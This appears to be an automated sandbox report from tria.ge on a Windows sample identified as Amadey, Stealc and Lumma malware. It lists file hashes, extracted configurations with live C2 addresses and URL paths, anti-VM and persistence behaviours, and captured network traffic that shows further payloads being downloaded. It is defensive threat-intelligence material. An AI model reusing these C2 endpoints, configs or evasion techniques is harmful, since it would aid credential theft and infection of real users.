Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
141s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
07/11/2024, 03:13 UTC
Static task
static1
Behavioral task
behavioral1
Sample
c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5.exe
Resource
win10v2004-20241007-en
General
-
Target
c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5.exe
-
Size
1.8MB
-
MD5
05b829047cbbd5d6fc28b471734f2c78
-
SHA1
70d19ae71b549d99b582d590e4cc1c6b49197f60
-
SHA256
c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5
-
SHA512
462299cda8cecf7dd9053b48e7837b3167d25bb174e15dbfd0f8eef0b335d4667f86251b00df944746eb196c1c6e4233319ff65c148ca50a8ca719a73a9047c8
-
SSDEEP
49152:K7WZX1nemVoLqmXAZgyZgV5Pwwv3pNkaUaLjnK:nZXonumXAZgOkHv
Malware Config
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
stealc
tale
http://185.215.113.206
-
url_path
/6c4adf523b719729.php
Extracted
lumma
https://founpiuer.store/api
Signatures
-
Amadey family
-
Lumma family
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5defb9403a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ad0d904167.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5defb9403a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5defb9403a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ad0d904167.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ad0d904167.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe -
Executes dropped EXE 3 IoCs
pid Process 2628 axplong.exe 2308 5defb9403a.exe 1492 ad0d904167.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 5defb9403a.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine ad0d904167.exe -
Loads dropped DLL 6 IoCs
pid Process 2436 c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5.exe 2436 c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5.exe 2628 axplong.exe 2628 axplong.exe 2628 axplong.exe 2628 axplong.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\5defb9403a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1002158001\\5defb9403a.exe" axplong.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\ad0d904167.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1002159001\\ad0d904167.exe" axplong.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 2436 c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5.exe 2628 axplong.exe 2308 5defb9403a.exe 1492 ad0d904167.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\axplong.job c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axplong.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5defb9403a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ad0d904167.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2436 c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5.exe 2628 axplong.exe 2308 5defb9403a.exe 1492 ad0d904167.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2436 c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2436 wrote to memory of 2628 2436 c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5.exe 31 PID 2436 wrote to memory of 2628 2436 c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5.exe 31 PID 2436 wrote to memory of 2628 2436 c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5.exe 31 PID 2436 wrote to memory of 2628 2436 c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5.exe 31 PID 2628 wrote to memory of 2308 2628 axplong.exe 33 PID 2628 wrote to memory of 2308 2628 axplong.exe 33 PID 2628 wrote to memory of 2308 2628 axplong.exe 33 PID 2628 wrote to memory of 2308 2628 axplong.exe 33 PID 2628 wrote to memory of 1492 2628 axplong.exe 34 PID 2628 wrote to memory of 1492 2628 axplong.exe 34 PID 2628 wrote to memory of 1492 2628 axplong.exe 34 PID 2628 wrote to memory of 1492 2628 axplong.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5.exe"C:\Users\Admin\AppData\Local\Temp\c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Users\Admin\AppData\Local\Temp\1002158001\5defb9403a.exe"C:\Users\Admin\AppData\Local\Temp\1002158001\5defb9403a.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2308
-
-
C:\Users\Admin\AppData\Local\Temp\1002159001\ad0d904167.exe"C:\Users\Admin\AppData\Local\Temp\1002159001\ad0d904167.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1492
-
-
Network
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 03:13:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 156
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 03:13:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /steam/random.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 03:13:11 GMT
Content-Type: application/octet-stream
Content-Length: 2163712
Last-Modified: Thu, 07 Nov 2024 02:49:06 GMT
Connection: keep-alive
ETag: "672c2aa2-210400"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 03:13:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /luma/random.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 03:13:13 GMT
Content-Type: application/octet-stream
Content-Length: 3155968
Last-Modified: Thu, 07 Nov 2024 02:48:53 GMT
Connection: keep-alive
ETag: "672c2a95-302800"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 03:13:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.206:80RequestGET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.206:80RequestPOST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FHJDGHIJDGCBAAAAAFIJ
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Requestpresticitpo.storeIN AResponse
-
Remote address:8.8.8.8:53Requestcrisiwarny.storeIN AResponse
-
Remote address:8.8.8.8:53Requestfadehairucw.storeIN AResponse
-
Remote address:8.8.8.8:53Requestthumbystriw.storeIN AResponse
-
Remote address:8.8.8.8:53Requestnecklacedmny.storeIN AResponse
-
Remote address:8.8.8.8:53Requestfounpiuer.storeIN AResponsefounpiuer.storeIN A172.67.133.135founpiuer.storeIN A104.21.5.155
-
Remote address:172.67.133.135:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: founpiuer.store
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BgPQFDng71AInwJRw7T5soc4Zb7xXMo50x0AAoOv4K3e3m8uiE2EOqEgNLuzSweNRtEAzKYKuVPIOfytCoSmttXEABIBgqUFYf9MUS660VR3hGG1cGPKgQfLqFRAXJQZwZk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8dea2589cf8976af-LHR
-
Remote address:172.67.133.135:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=Ue8I8PZYfq1I__8z2DrMQ6Yus7_5gmGplDnXyhAt888-1730949198-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 52
Host: founpiuer.store
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ijscgi5tnp0r6v7j9pgoq3hed1; expires=Sun, 02-Mar-2025 20:59:57 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2FT54sINVVd8STccxPW1zsRne7Zd6r32LLTxHasR9i5JxYPpEc5pUrFZ1LRPQ1PqOmRGREO5I4HbGbWiq2ahLVGc1ITS65VgLg3Dz2zLqkBWoIymLjkNo0SDyDPiKww2zQ0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8dea258a6fc076af-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=30642&sent=15&recv=13&lost=0&retrans=0&sent_bytes=7999&recv_bytes=1057&delivery_rate=491177&cwnd=257&unsent_bytes=0&cid=47aa2e68d0e73180&ts=434&x=0"
-
109.8kB 5.5MB 2299 3928
HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200HTTP Request
GET http://185.215.113.16/steam/random.exeHTTP Response
200HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200HTTP Request
GET http://185.215.113.16/luma/random.exeHTTP Response
200HTTP Request
POST http://185.215.113.16/Jo89Ku7d/index.phpHTTP Response
200 -
727 B 625 B 5 5
HTTP Request
GET http://185.215.113.206/HTTP Response
200HTTP Request
POST http://185.215.113.206/6c4adf523b719729.phpHTTP Response
200 -
1.7kB 9.8kB 15 18
HTTP Request
POST https://founpiuer.store/apiHTTP Response
403HTTP Request
POST https://founpiuer.store/apiHTTP Response
200
-
63 B 128 B 1 1
DNS Request
presticitpo.store
-
62 B 127 B 1 1
DNS Request
crisiwarny.store
-
63 B 128 B 1 1
DNS Request
fadehairucw.store
-
63 B 128 B 1 1
DNS Request
thumbystriw.store
-
64 B 129 B 1 1
DNS Request
necklacedmny.store
-
61 B 93 B 1 1
DNS Request
founpiuer.store
DNS Response
172.67.133.135104.21.5.155
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.1MB
MD5d21a2eb1558c04af68aa39932c381a77
SHA18a1c7f2c06fcf55ccdfb8155a2aa2ec94cb8c5bb
SHA256ba62e9e2f8ace5672fbc814db0b5fbd5a2d0a5d2d8ef55fd359e91ac756b4bbc
SHA512bffa84774f7857c827702c1f21619f55e4fe7b8fab650b1e8598ab5d5c327b9ddf80724a3be0acb605c5e177b330830276c59e999754fc28809f1781feba2fc7
-
Filesize
3.0MB
MD5a17f03daddf4ffd5b038f13ca94cca7d
SHA1ba20321c4f47082502dadddec7a70769c21e253a
SHA2564149dded7fd91b0eca160fff8d1e48d81bd206ef719bd54d1d5f86bc023eb4f9
SHA5127a4d981c68e5be25078a18ae2844c1842c491f93137b7b3037a3ae2af9dd1074ce37f33bcf79c7bb9e47eb83a3ceb595918171f09039c2d1d398e7d892479a54
-
Filesize
1.8MB
MD505b829047cbbd5d6fc28b471734f2c78
SHA170d19ae71b549d99b582d590e4cc1c6b49197f60
SHA256c7510bffe5fb99700c5fdcc63de2a95db0accf6d24ce7edde98fb0eb981734d5
SHA512462299cda8cecf7dd9053b48e7837b3167d25bb174e15dbfd0f8eef0b335d4667f86251b00df944746eb196c1c6e4233319ff65c148ca50a8ca719a73a9047c8